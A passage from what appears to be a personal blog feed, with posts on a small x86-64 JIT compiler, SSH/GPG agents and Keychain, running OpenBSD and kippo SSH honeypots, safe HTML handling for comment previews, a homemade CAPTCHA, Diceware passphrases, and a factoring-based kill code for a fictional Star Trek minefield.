data. Accessing memory in an invalid way will cause a segmentation
fault, usually leading to program termination. For example, NULL
points to a special page with read, write, and execute disabled.
Memory returned by malloc()
and friends will be writable and
readable, but non-executable. If the JIT compiler allocates memory
through malloc()
, fills it with machine instructions, and jumps to
it without doing any additional work, there will be a segmentation
fault. So some different memory allocation calls will be made instead,
with the details hidden behind an asmbuf
struct.
#define PAGE_SIZE 4096
struct asmbuf {
uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
uint64_t count;
};
To keep things simple here, I’m just assuming the page size is 4kB. In
a real program, we’d use sysconf(_SC_PAGESIZE)
to discover the page
size at run time. On x86-64, pages may be 4kB, 2MB, or 1GB, but this
program will work correctly as-is regardless.
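The run-time query would look like this (POSIX only):

```c
#include <unistd.h>

/* Query the real page size instead of hard-coding 4096 */
long
page_size(void)
{
    return sysconf(_SC_PAGESIZE);
}
```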
Instead of malloc()
, the compiler allocates memory as an anonymous
memory map (mmap()
). It’s anonymous because it’s not backed by a
file.
struct asmbuf *
asmbuf_create(void)
{
int prot = PROT_READ | PROT_WRITE;
int flags = MAP_ANONYMOUS | MAP_PRIVATE;
return mmap(NULL, PAGE_SIZE, prot, flags, -1, 0);
}
Windows doesn’t have POSIX mmap()
, so on that platform we use
VirtualAlloc()
instead. Here’s the equivalent in Win32.
struct asmbuf *
asmbuf_create(void)
{
DWORD type = MEM_RESERVE | MEM_COMMIT;
return VirtualAlloc(NULL, PAGE_SIZE, type, PAGE_READWRITE);
}
Anyone reading closely should notice that I haven’t actually requested that the memory be executable, which is, like, the whole point of all this! This was intentional. Some operating systems employ a security feature called W^X: “write xor execute.” That is, memory is either writable or executable, but never both at the same time. This makes the shellcode attack I described before even harder. For well-behaved JIT compilers it means memory protections need to be adjusted after code generation and before execution.
The POSIX mprotect()
function is used to change memory protections.
void
asmbuf_finalize(struct asmbuf *buf)
{
mprotect(buf, sizeof(*buf), PROT_READ | PROT_EXEC);
}
Or on Win32 (that last parameter is not allowed to be NULL
),
void
asmbuf_finalize(struct asmbuf *buf)
{
DWORD old;
VirtualProtect(buf, sizeof(*buf), PAGE_EXECUTE_READ, &old);
}
Finally, instead of free()
it gets unmapped.
void
asmbuf_free(struct asmbuf *buf)
{
munmap(buf, PAGE_SIZE);
}
And on Win32,
void
asmbuf_free(struct asmbuf *buf)
{
VirtualFree(buf, 0, MEM_RELEASE);
}
I won’t list the definitions here, but there are two “methods” for inserting instructions and immediate values into the buffer. This will be raw machine code, so the caller will be acting a bit like an assembler.
asmbuf_ins(struct asmbuf *, int size, uint64_t ins);
asmbuf_immediate(struct asmbuf *, int size, const void *value);
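Their definitions aren't shown, but from how they're used below, a plausible sketch is: instructions are emitted most-significant byte first (so the literal 0x4889f8 comes out as the bytes 48 89 f8), and immediates are copied verbatim, which on x86 means little endian.

```c
#include <stdint.h>
#include <string.h>

#define PAGE_SIZE 4096

struct asmbuf {
    uint8_t code[PAGE_SIZE - sizeof(uint64_t)];
    uint64_t count;
};

/* Emit an instruction, most-significant byte first */
void
asmbuf_ins(struct asmbuf *buf, int size, uint64_t ins)
{
    for (int i = size - 1; i >= 0; i--)
        buf->code[buf->count++] = (ins >> (i * 8)) & 0xff;
}

/* Emit an immediate operand verbatim (little endian on x86) */
void
asmbuf_immediate(struct asmbuf *buf, int size, const void *value)
{
    memcpy(buf->code + buf->count, value, size);
    buf->count += size;
}
```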
We’re only going to be concerned with three of x86-64’s many
registers: rdi
, rax
, and rdx
. These are 64-bit (r
) extensions
of the original 16-bit 8086 registers. The sequence of
operations will be compiled into a function that we’ll be able to call
from C like a normal function. Here’s what its prototype will look
like. It takes a signed 64-bit integer and returns a signed 64-bit
integer.
long recurrence(long);
The System V AMD64 ABI calling convention says that the first
integer/pointer function argument is passed in the rdi
register.
When our JIT compiled program gets control, that’s where its input
will be waiting. According to the ABI, the C program will be expecting
the result to be in rax
when control is returned. If our recurrence
relation is merely the identity function (it has no operations), the
only thing it will do is copy rdi
to rax
.
mov rax, rdi
There’s a catch, though. You might think all the mucky
platform-dependent stuff was encapsulated in asmbuf
. Not quite. As
usual, Windows is the oddball and has its own unique calling
convention. For our purposes here, the only difference is that the
first argument comes in rcx
rather than rdi
. Fortunately this only
affects the very first instruction and the rest of the assembly
remains the same.
The very last thing it will do, assuming the result is in rax
, is
return to the caller.
ret
So we know the assembly, but what do we pass to asmbuf_ins()
? This
is where we get our hands dirty.
If you want to do this the Right Way, you go download the x86-64 documentation, look up the instructions we’re using, and manually work out the bytes we need and how the operands fit into it. You know, like they used to do out of necessity back in the 60’s.
Fortunately there’s a much easier way. We’ll have an actual assembler
do it and just copy what it does. Put both of the instructions above
in a file peek.s
and hand it to nasm
. It will produce a raw binary
with the machine code, which we’ll disassemble with ndisasm
(the
NASM disassembler).
$ nasm peek.s
$ ndisasm -b64 peek
00000000 4889F8 mov rax,rdi
00000003 C3 ret
That’s straightforward. The first instruction is 3 bytes and the return is 1 byte.
asmbuf_ins(buf, 3, 0x4889f8); // mov rax, rdi
// ... generate code ...
asmbuf_ins(buf, 1, 0xc3); // ret
For each operation, we’ll set it up so the operand will already be
loaded into rdi
regardless of the operator, similar to how the
argument was passed in the first place. A smarter compiler would embed
the immediate in the operator’s instruction if it’s small (32-bits or
fewer), but I’m keeping it simple. To sneakily capture the “template”
for this instruction I’m going to use 0x0123456789abcdef
as the
operand.
mov rdi, 0x0123456789abcdef
Which disassembled with ndisasm
is,
00000000 48BFEFCDAB896745 mov rdi,0x123456789abcdef
-2301
Notice the operand listed little endian immediately after the instruction. That’s also easy!
long operand;
scanf("%ld", &operand);
asmbuf_ins(buf, 2, 0x48bf); // mov rdi, operand
asmbuf_immediate(buf, 8, &operand);
Apply the same discovery process individually for each operator you
want to support, accumulating the result in rax
for each.
switch (operator) {
case '+':
asmbuf_ins(buf, 3, 0x4801f8); // add rax, rdi
break;
case '-':
asmbuf_ins(buf, 3, 0x4829f8); // sub rax, rdi
break;
case '*':
asmbuf_ins(buf, 4, 0x480fafc7); // imul rax, rdi
break;
case '/':
asmbuf_ins(buf, 3, 0x4831d2); // xor rdx, rdx
asmbuf_ins(buf, 3, 0x48f7ff); // idiv rdi
break;
}
As an exercise, try adding support for the modulus operator (%), XOR
(^), and bit shifts (<<, >>). With the addition of these
operators, you could define a decent PRNG as a recurrence relation. It
will also eliminate the closed form solution to this problem so
that we actually have a reason to do all this! Or, alternatively,
switch it all to floating point.
Once we’re all done generating code, finalize the buffer to make it
executable, cast it to a function pointer, and call it. (I cast it as
a void *
just to avoid repeating myself, since that will implicitly
cast to the correct function pointer prototype.)
asmbuf_finalize(buf);
long (*recurrence)(long) = (void *)buf->code;
// ...
x[n + 1] = recurrence(x[n]);
That’s pretty cool if you ask me! Now this was an extremely simplified situation. There’s no branching, no intermediate values, no function calls, and I didn’t even touch the stack (push, pop). The recurrence relation definition in this challenge is practically an assembly language itself, so after the initial setup it’s a 1:1 translation.
I’d like to build a JIT compiler more advanced than this in the future. I just need to find a suitable problem that’s more complicated than this one, warrants having a JIT compiler, but is still simple enough that I could, on some level, justify not using LLVM.
*-agent
programs. The agents
allow you to gain a whole lot of convenience without compromising your
security. Many people seem to be unaware these tools exist, so here’s
an overview along with some tips on how to use them effectively.
Let’s start from the top.
Both SSH and GPG involve the use of asymmetric encryption, and the private key is protected by a user-entered passphrase. The private key is generally never written in to the filesystem in plaintext. In the case of GPG, these keys are the primary focus of the application. For SSH, they’re a useful tool to make accessing remote machines less tedious. (The SSH server is authenticated by a public key, too, but this is unrelated to agents.)
For those who are unaware, rather than enter a password when logging into a remote machine, you can identify yourself by a public key. Generating a key is simple.
ssh-keygen
You’ll almost certainly want to accept the default location for the
key (~/.ssh/id_rsa
) because this is where SSH will look for it. Make
sure you enter a passphrase, which will encrypt the private key. The
reason this is important is because, without it, anyone who gains
access to your id_rsa
file will be able to access any remote systems
that have been told to trust your public key. By having a passphrase,
this person needs not only the id_rsa
file, but also the passphrase
(two-factor authentication), so you probably want to pick a long,
strong one. This may sound inconvenient, but ssh-agent
will help
you.
The key generation process will create two files: id_rsa
(private
key) and id_rsa.pub
(public key). The latter is what you give to
remote systems.
Telling a remote system about your key is simple,
ssh-copy-id <host>
This will copy your id_rsa.pub
to the remote system, prompting you
for the password on the remote system (not the passphrase you just
entered), adding it to the file ~/.ssh/authorized_keys
. From this
point on, all logins will use your new keypair rather than prompt you
for a password. Since you put a passphrase on your key, this may seem
pointless — it seems you still need to type in a password for every
connection. Bear with me here!
As a side note, you should have a unique SSH keypair for each site, so you’ll have several of them. This way you can revoke access to a particular site without affecting the others.
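For example, per-site keys can be selected automatically from ~/.ssh/config (the host and file names here are hypothetical):

```
# generated with: ssh-keygen -f ~/.ssh/id_rsa_example
Host example.com
    IdentityFile ~/.ssh/id_rsa_example
```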
For GPG — the GNU Privacy Guard, the free software PGP
implementation — your keys are stored under ~/.gnupg/
in a
database. Generating a key is also a simple command,
gpg --gen-key
This is a slightly more complicated process, which I won’t get into here. In contrast to SSH, you’ll generally have only one keypair per identity (i.e. you only have one).
So you’ve got these keys encrypted by passphrases. If the passphrases are going to be any use, they’ll be long, annoying things that are a pain to type in. If that was the end of the story this would be really inconvenient, enough to make the use of passphrases too costly for many people to bother with. Fortunately, we have agents to help.
An agent is a daemon process that can hold onto your passphrase
(gpg-agent
) or your private key (ssh-agent
) so that you only need
to enter your passphrase once within some period of time (possibly
for the entire life of the agent process), rather than type it many
times over and over again as it’s needed. The agents are very careful
about how they hold on to this sensitive information, such as avoiding
having it written to swap. You can also configure how long you want
them to hold onto your passphrase/key before purging it from memory.
The ssh
and gpg
programs need to know where to find the
agents. This is done through environment variables. For ssh-agent
,
the process ID is stored in SSH_AGENT_PID
and the location of the
Unix socket for communication is in SSH_AUTH_SOCK
. gpg-agent
stuffs everything into one variable, GPG_AGENT_INFO
(which is a pain
if you want to use this information in a script). When the main
program is invoked and it needs to use the private key, it will use
these variables and get in touch with the agent to see if it can
supply the needed information without bothering the user.
Remember, a process can’t change the environment of its parent process, so you need to set this information in the agent’s parent shell somehow. There are two methods to set these up: eval and exec.
When you start the agent, it forks off its daemon process and prints
the variable information to stdout. This can be eval
ed directly into
the current environment. You could drop these lines directly in your
.bashrc
so that the agents are always there. (Though they won’t exit
with your shell, lingering around uselessly! More on this ahead.)
eval $(ssh-agent)
eval $(gpg-agent --daemon)
For the exec method, you replace your current shell with a new one with a modified environment. To do this, you ask the agent to exec into a shell, with the variables set, rather than return control.
exec ssh-agent bash
exec gpg-agent --daemon bash
As a cool trick, you can chain these together. ssh-agent
becomes
gpg-agent
which then becomes bash
.
exec ssh-agent gpg-agent --daemon bash
Note that gpg-agent
is capable of being an ssh-agent
as well by
using the --enable-ssh-support
option, so you don’t need to launch
an ssh-agent
. Unfortunately, I don’t like to use this because
gpg-agent
gets a little too personal with the SSH key, storing its
own copy with its own passphrase again.
On the other hand, gpg-agent
is much more advanced than OpenSSH’s
ssh-agent
. When you want to have ssh-agent
manage a key, you need
to first tell it about the key with ssh-add
. With no arguments, it
will use ~/.ssh/id_rsa
. If you forget to do this, ssh
will ask for
your passphrase directly, in your terminal, not allowing ssh-agent
to hold onto it. By comparison, gpg
will always ask gpg-agent
to
retrieve your passphrase when it’s needed (if the agent is available),
so it will cache your passphrase on demand. No need to explicitly
register with the agent. Even better, it will try its best to use a
“PIN entry” program to read your key, which helps protect against some
kinds of keyloggers — preventing other processes from seeing your
keystrokes.
Well, this is all fine and dandy except when you’ve already got an
agent running. Say you’re launching a new terminal emulator window
from an existing one, creating a new shell. Unfortunately, even though
you have agents running and they’re listed in your environment (from
the origin shell), they’ll still spawn new agents! This is really
lousy behavior, in my opinion. There’s no --inherit
option to tell
them to silently pass along the information of the existing agent if
it appears to be valid. This causes two problems. One, you’ll need to
enter your passphrases again for the new agent. Second, these new
agents will linger around after the spawning shell has exited —
hogging important non-swappable memory.
The direct workaround is to, in your shell init script, check for these variables yourself and check that they’re valid (the agent process is still running) before trying to spawn any agents. This is tedious, error-prone, and makes each user do a lot of work that could have been done in one place by one person instead.
There’s still the problem of when you launch a new shell that doesn’t inherit the variables (i.e. a remote login), so there’s no way for it to be aware of the existing agents. To fix this, you’d need to write the agent information to a file. The shell init script checks this file for an existing agent before spawning one. This is even more complicated, more error-prone, and subject to race conditions. Why make every user go through this process?!
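The file-based variant of that workaround looks roughly like this sketch (the info-file path is my own choice):

```shell
# Reuse a previously saved agent if it's still alive,
# otherwise start a fresh one and save its environment.
agent_info="$HOME/.ssh-agent-info"
[ -f "$agent_info" ] && . "$agent_info" > /dev/null
if ! kill -0 "$SSH_AGENT_PID" 2> /dev/null; then
    ssh-agent > "$agent_info"
    . "$agent_info" > /dev/null
fi
```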
Fortunately someone’s done all this work so you don’t have to! There’s
an awesome little tool called
Keychain which can be used to
launch the agents for you. It stores the agent information in a file
so that you only ever launch one instance of the agent, and the agents
will be shared across every shell. It does have an --inherit
option — the default behavior, so you don’t even need to ask
nicely. Instead of running the *-agent
s directly, you just put this
in your .bashrc
,
eval $(keychain --eval --quiet)
So simple and it just works! I was so happy when I found this. This is the magic word that makes using agents a breeze, so I can’t recommend it enough.
]]>A honeypot is a fake service or computer on a network used in detecting and deflecting attacks on the network. Ideally, an attacker is unable to tell honeypots apart from real systems, attacking the honeypots instead. In general, honeypots fall into two categories: high-interaction and low-interaction. The former will imitate a real system with high fidelity while the latter may just listen for connections on common ports, without actually accepting or sending data.
What triggered my curiosity was that I wanted to put OpenBSD’s
securelevel(7)
feature to the test. In short, it’s a runtime system value that ranges
from -1 (least secure) to 2 (most secure), and it’s not possible to
decrease the level without gaining physical access to the system. Each
increase makes the system more read-only, and less flexible, so it’s a
trade-off. A system running at level 2 should not carry over any state
between boots — like a LiveCD on a system with no disks.
I set up a fresh OpenBSD install in a QEMU virtual
machine, locked the system down with securelevel
at 1, forwarded the
SSH port all the way out to the Internet, and then gave
Gavin the root password. I told him to go nuts,
with the ultimate goal that when he was done I should be unable to
tell he had even logged into the system. All of the system logs were
set to append-only, enforced through the kernel by securelevel
, so
this should have been a very difficult task indeed.
It turned out he was much more successful than I expected. When he
told me he was done, I SSHed into the system to check the logs, finding
that there were no entries indicating he logged in at all. The only
proof I could find that he was actually in was a message he
intentionally left behind for me. Did he just subvert securelevel
?!
Turns out not quite. Whew! I was just putting too much trust into a
system I knew was compromised. He mounted a loopback filesystem
over top of /var/log
, then filled it with fake logs. He also
sabotaged the mount programs so that they’d hide the loopback mount
from me. Since the mount programs were on a read-only system, he had
to do a loopback mount there, too. After restarting OpenSSH, it was no
longer writing to the append-only log, but to the doctored log.
So, the proper way to check your security logs is by mounting the
compromised filesystem in a known trusted system — or, in this case,
just rebooting would have fixed it. Even with securelevel
, you can’t
check the compromised system in-place. Let this be a lesson to all
those amateur sysadmins out there (including me)!
We did a second round and he managed to trick me again by taking me further into the rabbit hole. Instead of loopback mounts, since I was expecting that, he had root log into a chroot environment, filled with a full copy of the system including fake logs. This version survived reboots and really required inspection from an external system.
After all this, I wanted to crank things up a notch by letting some real attackers into my test system. I was already accustomed to seeing many password guesses against my SSH server in the logs, so getting someone into my honeypot wouldn’t take long at all. While I didn’t care if they trashed my VM — restoring from snapshot was an automatic process — I really didn’t want them to take advantage of my Internet connection, using it for DDoS attacks or pivoting to attack other SSH servers. So I needed a way to allow them in through SSH, but not allow any other traffic out.
If I was doing this today, I’d probably use iptables
to only allow
SSH in, and then bridge the VM to the Internet with a TUN/TAP,
replacing my real SSH server on port 22. However, three years ago I
didn’t know how to do this. Instead I found a really simple hack to
get this done: tsocks
. tsocks
adds SOCKS proxying to any application by replacing the sockets API
with its own. In my case, I wrapped the VM in tsocks
configured to
use a non-existent SOCKS proxy (127.0.0.1). It could accept any
incoming connection (though limited to SSH because of NAT) but was unable
to make any outgoing connections. Perfect!
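The tsocks.conf for this amounts to a dead-end proxy (a sketch; any address nothing is listening on will do, and 1080 is just the SOCKS default):

```
# Route all outgoing connections to a SOCKS proxy that doesn't
# exist, so they simply fail.
server = 127.0.0.1
server_port = 1080
```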
I hadn’t realized it yet, but this was a high-interaction SSH honeypot I created.
I set the root password to “password” and let it go for awhile, tailing the OpenSSH logs to watch for activity. The brute-force bots would eventually make their way inside but immediately log out and keep guessing passwords for root. Either they were really poorly programmed or they were specifically testing for honeypots that allow different passwords. They must have logged the address for a human to investigate some time in the future, because I never witnessed any shell activity. On the other hand, this was all very difficult to observe, for the same reasons Gavin was able to cover his tracks. My honeypot was useful for catching and detecting attackers, but it wasn’t good for observing them in action.
While I was investigating this I came across Kojoney, which is a low-interaction SSH honeypot mainly for seeing what sorts of passwords attackers were guessing. Unfortunately, I could never get it to work, so I never used it.
Several years passed and I recently came across a project that didn’t exist last time: kippo, a “medium”-interaction SSH honeypot. This is everything I was looking for before. It doesn’t require a full-blown VM, it has high-fidelity interaction, it’s safe, and it allows me to fully observe all activity — it even records the tty session for replay. Cool!
kippo is written in pure Python, so there shouldn’t be any buffer overflows, and doesn’t execute any external programs. It should be safe, but I’m not aware of any real security reviews, so it’s a use-at-your-own risk thing. They warn about this on their website.
I’ve run this off and on on the weekends. Since I haven’t run my real
SSH server on port 22 since 2009 (no recorded attacks since!), my IP
address attracts much less attention than before, so it hasn’t seen too
much activity. I have had two humans connect and log in. Both
downloaded a well-known script kiddie tool called go.sh
. Here’s an
analysis of the tool by someone who was actually attacked with it:
SSH Bruteforce.
In fact, go.sh is so well known that it gave me a little scare. In my tty recording it looked like the tool was actually executed! The skull banner printed out and it had an interface. I was really nervous until I found kippo’s malware.py. Kippo actually recognizes some script kiddie tools and imitates their interfaces to further confuse attackers. I do run kippo as an unprivileged user, so it wouldn’t be the end of the world if something did happen, but I’d still be uncomfortable.
There’s a neat feature of kippo which hilariously caught Gavin off-guard when I had him poke at it. kippo will never disconnect a session on its own. If an exit or C-d is given, it drops into another fake shell with the hostname “localhost”, merely pretending to log out. That way you get a chance to see some commands the attackers mean to run on their own system, before they realize their mistake. The only way to disconnect is to either close your terminal emulator or use SSH’s ~. escape sequence.
I’ve been considering running kippo all the time with no password set — using it as a true honeypot. This would help keep anyone from finding my real SSH server, since they would find the honeypot and stop searching other ports. It would also waste time that could be spent attacking other people’s real SSH servers, helping to protect other servers out there. My real SSH server (on my router) doesn’t allow password logins, only key logins, so I already feel pretty good about its security. I’ve never seen a brute-force attempt on the current port anyway. But if I do, I now have kippo as another tool in my security toolbelt.
]]>Many comment/discussion systems get previews wrong. This even includes major sites like Boing Boing and Slashdot. Sometimes they feed back a different comment in the textarea, so repeated previews slowly degrade the comment. Other times the comment preview isn't the same thing as the final result. A comment actually has four states:
The raw comment is the unfiltered string of bytes from the user. This is not safe to give directly back to the user, as it could be exploited to feed an arbitrary page to an innocent user.
The escaped comment is created from the raw comment by filtering it through the escapeHTML() function. This function creates HTML entities out of some of the characters, like < and >. A browser will interpret the escaped comment as a simple string, so it is safe to give back to the user. This function is actually provided by perl's CGI module, so perl programmers need not implement this.
Note that escapeHTML() is reversible, though the server side won't need to reverse it. The browser does.
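For illustration, here is roughly what that escape step and its reversal look like using Python's stdlib html module — an analogue of perl's CGI escapeHTML(), not the post's actual code:

```python
import html

raw = '<script>alert("hi")</script>'

# Turn markup-significant characters into entities; a browser shows
# the result as a plain string instead of interpreting it as HTML.
escaped = html.escape(raw)

# The escaping is lossless -- the browser effectively reverses it
# for display, just as the post notes.
assert html.unescape(escaped) == raw
```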
The stripped comment is created from the raw comment by filtering it through stripHTML(), which removes non-whitelisted HTML tags. It also strips non-whitelisted attributes from allowed tags. It should probably add a rel="nofollow" to links. It also runs escapeHTML() on attribute values and content outside tags. This is safe to give back to the user because only safe tags are left.
If your comments use markup other than HTML, like BBCode, this function should strip all HTML (your whitelist is empty) and do the conversion from your markup to HTML.
It might also be a good idea for it to produce well-formed HTML. This will allow your comments/discussion pages to be XHTML compliant.
stripHTML() is irreversible because it discards information.
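A whitelist-based stripper along these lines can be sketched with Python's stdlib HTMLParser. The tag set and the attribute handling here are simplified assumptions for illustration, not the post's actual perl implementation:

```python
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "code"}  # example whitelist

class StripHTML(HTMLParser):
    """Drop non-whitelisted tags, drop all attributes, escape text content."""

    def __init__(self):
        # convert_charrefs=True folds entities into text, which we re-escape,
        # so existing entities in the input survive the round trip safely.
        super().__init__(convert_charrefs=True)
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            # A fuller version would keep whitelisted attributes here.
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))

def strip_html(raw: str) -> str:
    parser = StripHTML()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)
```

Note the irreversibility in action: the onclick attribute and the disallowed tag are simply gone from the output.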
The stored comment is the encoding of the comment in the system. This depends entirely on the storage system. In some cases it may be identical to the stripped comment (and store() is the identity function). If the comment is going through SQL into a database, some characters may need to be escaped so as not to cause problems. It could even be a base64 encoding.
store() must be unambiguously reversible, and the server should have an unstore() to do this. It should probably also be able to convert any arbitrary string of characters into a safe encoding for storage.
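As a concrete example of the base64 option, a reversible store()/unstore() pair is a one-liner each in Python (the function names simply mirror the post's hypothetical ones):

```python
import base64

def store(stripped: str) -> str:
    """Encode the stripped comment into a storage-safe ASCII string."""
    return base64.b64encode(stripped.encode("utf-8")).decode("ascii")

def unstore(stored: str) -> str:
    """Exactly invert store() -- the round trip must be lossless."""
    return base64.b64decode(stored).decode("utf-8")
```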
There should only be one version of all these functions for both previews and final posting of comments.
When doing a comment preview both the escaped comment and the stripped comment are given back to the user. The stripped comment is dropped in as HTML, and the escaped comment is put into the textarea of the form. It would probably be convenient for the user if you give them back any other form information, including the same captcha and their answer to it (or not charge them with a captcha for that comment anymore).
You may be tempted to store the raw comments (safely with store()) and do HTML stripping on the fly. This would allow you to upgrade your HTML stripping function in the future to "better" handle user input. I don't recommend it. That's extra processing for each page request, but worse, it breaks the concept of the preview, because the comment formatting is subject to change in the future.
The hardest function to implement is probably stripHTML(), because it needs to be able to handle poorly formed HTML. If you are using perl, you will probably want to use the HTML::Parser module, which is what I did. This does everything noted above and also auto-links anything that looks like a URL, forces proper comment nesting, automatically makes paragraphs from blank-line-separated chunks, and almost produces well-formed HTML.
The documentation is basically non-existent, but if you want to whitelist more tags add them to @allowed_tags. Use it, abuse it.
I use this code in my comment system, so you can play around with it by using my preview function.
]]>Update: This post is referring to my old web hosting situation. I'm now using external comment hosting because my blog is now statically hosted.
I finally have a comment system, thanks to pollxn, a blosxom comment system that actually works. There is a link to it, indicating the number of comments, in the bottom of each post. Try it out and say hello.
Unfortunately, pollxn doesn't have any sort of anti-spam or CAPTCHA system. If you look around the Interwebs where other people are using pollxn, you will see everyone has their own little CAPTCHA thing. Well, I am not different. I hacked together my own to keep away automated spammers.
It selects words from the dictionary (of 40,000 words in this case) and encrypts them with Blowfish in CBC mode, with a unique IV each time. This is then passed to the user, who passes it to an image generator, which decrypts the word and uses GD in Perl to render it, apply some transforms, and drop a line randomly over it. The user submits their guess of the image along with the encrypted version (hidden field), which is decrypted and compared on the other end. The same encrypted ID cannot be used twice, but thanks to the IV the same word can be used twice.
Here are some samples. If you hit refresh, they will render differently. (Update: not any more. These are just static examples now.)
It's not a great CAPTCHA, but it should be good enough for the low volume of traffic I see here. As I inevitably collect small amounts of spam (by spammers manually passing the CAPTCHA), I will gradually create the needed tools to combat it. I can also easily update the CAPTCHA image algorithm without disrupting the functioning of the website.
I'm sure I will be making improvements to the comment system over time as well. I should make it obfuscate e-mail addresses, for one. Maybe add a preview. And better blosxom integration.
So say hello below! I am excited to finally have a real blog.
]]>Diceware is a method of easy-to-remember, easy-to-type, secure passphrase and password generation. It works completely off-line and requires no computer whatsoever, apart from retrieving the Diceware list. By taking the passphrase generation off-line there is less room for mistakes to be made.
The reason these passwords are easy to remember is that they are simply a series of words in your native language. This also tends to make them easier to type without lots of practice, since you should already be used to typing words.
You can grab the word lists directly,
Diceware Word List
Beale's Diceware Word List
The lists are cryptographically signed by Arnold G. Reinhold so you can verify that I have not tampered with them. I must also note that, unfortunately, the author requires that these lists only be distributed non-commercially, which limits their usefulness but allows me to distribute them here.
I also came across another list called DialDice, which I have mirrored here and signed with my own key,
Diceware works by rolling five 6-sided dice (or rolling one 6-sided die five times, etc.) and using the result to look up the word in one of the above lists of 6^5, or 7776, words. Each word is worth about 12.9 bits of entropy,
log2(7776) =~ 12.9248
So if you want a password worth about 40 bits — which is about 7 letters of a random alphanumeric password — you would generate three Diceware words. They can be concatenated in any order and in any fashion. When I use Diceware, I just mash them together, like "lancealertgrow". Note that the space bar makes a distinctive sound when pressed, so if you put spaces between your words a listener will be able to tell how many words you use.
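The arithmetic is easy to check (a quick sketch, not part of Diceware itself):

```python
import math

# Five rolls of a 6-sided die select one of 6^5 = 7776 words.
bits_per_word = math.log2(6 ** 5)

print(round(bits_per_word, 4))      # 12.9248 bits per Diceware word
print(round(3 * bits_per_word, 2))  # 38.77 -- three words, roughly 40 bits
```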
If you don't like what you rolled the first time, DO NOT generate a new one as an attempt to get something "better". If you do this, you will greatly weaken your passwords because you are selecting passwords from a much smaller pool of possibilities (a very small pool that contains only passwords you like).
The number of possible three-word passwords is 470,184,984,576. That's right: 470 billion. Because you are selecting passwords with dice, each password is exactly as likely as the next. Even if an attacker knew you used Diceware and knew which word list you used, they would still be left guessing among those 470 billion possibilities.
At first it may be confusing, but it actually doesn't matter what the words are or how long they are. It doesn't matter that there are no capitals or special characters. It is the simple fact that there are 7776 words, and one was selected three times.
7776 * 7776 * 7776 = 470184984576
The Diceware website goes into a bit more detail on this.
If the computer system you use annoyingly requires passwords to contain special characters (a rule meant to add entropy to passwords that are otherwise poor), Diceware also provides a method of adding some of those, which adds a couple more bits worth of entropy. If you don't care about those extra bits, you can throw your own in.
For passphrases, Diceware recommends 6 words, about 77.5 bits, which it claims should be out of range of brute-force attacks from anyone for at least the next 20 years. If you really think you need more than 6 words, you should consider hiring guards for all your computer equipment.
I was working on my own Diceware word list to release into the public domain. The purpose was to provide a word list without any distribution restrictions, unlike all the Diceware lists I have found. But making word lists is hard! I wrote a number of little filters — word length, no sub-words, spell checking, no special characters, etc. — to pull out good words from a large word list, then used some sample English text from Wikipedia to get frequency information so that I was selecting common words over less common ones. I still need to go over the final list by hand to make sure it all looks good. This is a long, tedious process. Carefully examining 7776 words is quite a lot of work. Someday I will finish it.
In the event that you don't have any dice available, or you want to be able to generate Diceware passwords on the fly automatically, I have written a little program that will use /dev/random, assuming there is a true RNG behind it, to roll virtual dice. It can use a Diceware word list or your local dictionary word list, which contains many more words (usually found at /usr/share/dict/words). Grab it here,
To get help, just run it with --help. So, to generate a two word password using the local dictionary,
$ ./passgen.pl -w2
Bits per word: 14.4421011596755
Key length: 28.8842023193511
grisly cog
It also tells you how many bits the password is worth.
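A minimal Python analogue of such a generator might look like the following. (passgen.pl itself is perl, and this tiny stand-in word list is made up; the real program loads a 7776-word Diceware list or /usr/share/dict/words.)

```python
import math
import secrets

# Tiny illustrative word list -- a real run loads thousands of words.
WORDS = ["grisly", "cog", "lance", "alert", "grow", "maple", "orbit", "quartz"]

def passgen(nwords: int) -> str:
    bits_per_word = math.log2(len(WORDS))
    print(f"Bits per word: {bits_per_word}")
    print(f"Key length: {nwords * bits_per_word}")
    # secrets draws from the OS CSPRNG, much like reading /dev/random,
    # so every word is selected uniformly and independently.
    return " ".join(secrets.choice(WORDS) for _ in range(nwords))
```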
I highly recommend Diceware for your password and passphrase generation.
]]>Some time ago I was watching through the entire series of Deep Space 9. It was a Star Trek television show about a space station that rests next to a wormhole connecting to the other side of the galaxy (the Gamma quadrant).
The Gamma quadrant is ruled by a group called the Dominion, which is looking to conquer the Federation's side of the galaxy (the Alpha quadrant). At one point during the series, the Federation needs to temporarily disable the wormhole to prevent Dominion ships from crossing through. They do this by mining the wormhole with identical, cloaked, self-replicating mines.
If a mine is destroyed, the neighboring mines will replicate a replacement. The minefield repairs itself. This makes removing the minefield within a reasonable amount of time difficult to impossible. If even a single mine is left behind, it can replicate the entire minefield again.
The most interesting question here is this:
When the Federation returns and wants to remove the minefield, how would they do it? What would stop the Dominion from doing the same thing?
The first thing that comes to mind is having a kill signal, but what would this signal be? It could simply be a plain "kill" command, but the Dominion could also broadcast such a signal to disable the minefield. Consider that the Dominion could capture a single mine and study everything about its workings. The minefield itself could therefore hold no secrets whatsoever. This leaves out any possibility of a secret kill command stored in the mines.
Here's what I would do, assuming that humans or aliens have not yet discovered some giant breakthrough in factoring in the Star Trek universe. I would randomly generate two very large prime numbers. Today, two 1024-bit primes should be more than enough, but in 350 years even larger numbers would probably be necessary. Then I would multiply these two numbers together and store the product in the mine software. To disable the minefield, I simply broadcast these two numbers to the minefield. The mines would be programmed to take the product of any pair of numbers they receive. If the product matches the internal number, the mine shuts down.
Voila! A method for shutting down the minefield. The enemy can know everything about every single mine's construction, including the software and data stored on every mine, but will be unable to disable the minefield without factoring a very large composite number, which would presumably be difficult or impossible (within a reasonable amount of time).
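A toy version of that check, with tiny primes for illustration (a real mine would bake in the product of two random primes of at least 1024 bits each):

```python
# Every mine stores only the composite; the prime factors never leave
# the Federation until it's time to disarm.
N = 61 * 53  # = 3233; in reality the product of two huge random primes

def receive_broadcast(a: int, b: int) -> bool:
    """Shut down iff the broadcast pair is a nontrivial factorization of N."""
    return a > 1 and b > 1 and a * b == N
```

An attacker who disassembles a captured mine learns only N, and disarming still requires factoring it.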
